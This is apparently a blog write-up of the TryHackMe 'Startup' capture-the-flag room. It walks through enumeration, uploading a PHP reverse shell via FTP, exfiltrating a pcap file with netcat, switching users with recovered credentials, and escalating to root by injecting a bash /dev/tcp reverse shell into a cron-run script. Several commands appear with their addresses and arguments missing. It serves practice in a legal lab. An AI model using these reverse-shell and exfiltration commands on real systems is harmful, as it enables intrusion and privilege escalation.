Article Image

Startup TryHackMe

Let’s take a look at the Startup CTF on TryHackMe.


Nmap Scan

The first step of my enumeration was a scan with nmap. by the command:

sudo nmap


The “Nmap Output” displayed 3 services running under ports 21, 22 and 80.

Gobuster Scan

I next decided to run a gobuster scan on the webserver to see if there were any interesting hidden directories, by the command: Gobuster


Let's take a closer look at the /files directory: Files

In the /files we found a directory and two files: a text file and an image. The same files found on in the the FTP server: FTP

So Now I decided to put a reverse shell file inside the ftp directory to access the machine, With the use of php-reverse-shell I changed the ip address and the port: Payload

And I started a netcat listener on the local machine before clicking the php-reverse-shell.php:

nc -nlvp 4444

And we found the special recipe.txt ## User Flag Also I found an uncommon directory /incidents with a .pcapng file and with this method I download the file:

  • In the local machine:
nc -lvp 1234 > suspicious.pcapng
  • In the victim machine:
nc 1234 < suspicious.pcapng

Then I analyzed the packets and I found: Pcap

With The credentials that I've found I tried to swith into user lennie:

su lennie

Root Flag

In the home directory I searched inside the scripts dir an I've found two scripts one have : Planner

And the script called another file that is execute: /etc/print.sh, The file also is owned by user lennie So I want to create a reverse shell using GTFObins and I add this to the script:

bash -c 'exec bash -i &>/dev/tcp/ <&1'

Bingo I'm now a root:


Thanks for reading!!!


––– views